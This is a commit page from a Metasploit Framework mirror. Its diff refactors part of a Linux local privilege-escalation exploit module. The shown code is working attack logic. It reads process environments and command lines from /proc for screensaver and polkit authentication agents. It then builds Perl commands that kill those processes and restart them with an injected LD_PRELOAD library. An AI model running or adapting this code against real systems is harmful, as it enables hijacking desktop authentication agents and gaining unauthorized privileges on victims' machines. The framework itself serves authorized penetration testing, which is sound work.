infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean get_restart_commands

bug/bundler_fix
jvazquez-r7 2014-12-24 14:55:18 -06:00
parent 92b3505119
commit 36ac0e6279
1 changed files with 20 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
modules/exploits/linux/local/desktop_privilege_escalation.rb
View File

@ -109,29 +109,44 @@ class Metasploit4 < Msf::Exploit::Local
end end
def get_restart_commands def get_restart_commands
text_output = cmd_exec('pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";$/=undef;for("cmdline","environ"){open F,"</proc/$pid/$_";print "$_:".unpack("H*",<F>),"\n";}}\'').gsub("\r","") get_cmd_lines = 'pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|'
get_cmd_lines << 'perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";'
get_cmd_lines << 'print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";'
get_cmd_lines << '$/=undef;'
get_cmd_lines << 'for("cmdline","environ"){open F,"</proc/$pid/$_";print "$_:".unpack("H*",<F>),"\n";}}\''
text_output = cmd_exec(get_cmd_lines).gsub("\r",'')
vprint_status(text_output) vprint_status(text_output)
lines = text_output.split("\n") lines = text_output.split("\n")
process_restart_commands = []
restart_commands = []
i=0 i=0
while(i < lines.length-3) while i < lines.length - 3
m = lines[i].match(/^PID:(\d+)/) m = lines[i].match(/^PID:(\d+)/)
if m if m
pid = m[1] pid = m[1]
vprint_status("PID=#{pid}") vprint_status("PID=#{pid}")
print_status("Found process: " + lines[i+1]) print_status("Found process: " + lines[i+1])
exe = lines[i+1].match(/^EXE:(\S+)$/)[1] exe = lines[i+1].match(/^EXE:(\S+)$/)[1]
vprint_status("exe=#{exe}") vprint_status("exe=#{exe}")
cmdline = [lines[i+2].match(/^cmdline:(\w+)$/)[1]].pack("H*").split("\x00") cmdline = [lines[i+2].match(/^cmdline:(\w+)$/)[1]].pack("H*").split("\x00")
vprint_status("CMDLINE=" + cmdline.join(" XXX ")) vprint_status("CMDLINE=" + cmdline.join(" XXX "))
env = lines[i+3].match(/^environ:(\w+)$/)[1] env = lines[i+3].match(/^environ:(\w+)$/)[1]
restart_command = 'perl -e \'use POSIX setsid;open STDIN,"</dev/null";open STDOUT,">/dev/null";open STDERR,">/dev/null";exit if fork;setsid();kill(9,' + pid + ')||exit;%ENV=();for(split("\0",pack("H*","' + env + '"))){/([^=]+)=(.*)/;$ENV{$1}=$2}$ENV{"LD_PRELOAD"}="LD_PRELOAD_PLACEHOLDER";exec {"' + exe + '"} ' + cmdline.map{|x| '"' + x + '"'}.join(", ") + '\''; restart_command = 'perl -e \'use POSIX setsid;open STDIN,"</dev/null";open STDOUT,">/dev/null";open STDERR,">/dev/null";exit if fork;setsid();kill(9,' + pid + ')||exit;%ENV=();for(split("\0",pack("H*","' + env + '"))){/([^=]+)=(.*)/;$ENV{$1}=$2}$ENV{"LD_PRELOAD"}="LD_PRELOAD_PLACEHOLDER";exec {"' + exe + '"} ' + cmdline.map{|x| '"' + x + '"'}.join(", ") + '\'';
vprint_status("RESTART: #{restart_command}") vprint_status("RESTART: #{restart_command}")
process_restart_commands.push(restart_command) restart_commands.push(restart_command)
end end
i+=1 i+=1
end end
return process_restart_commands
restart_commands
end end
def c_code(exe_file) def c_code(exe_file)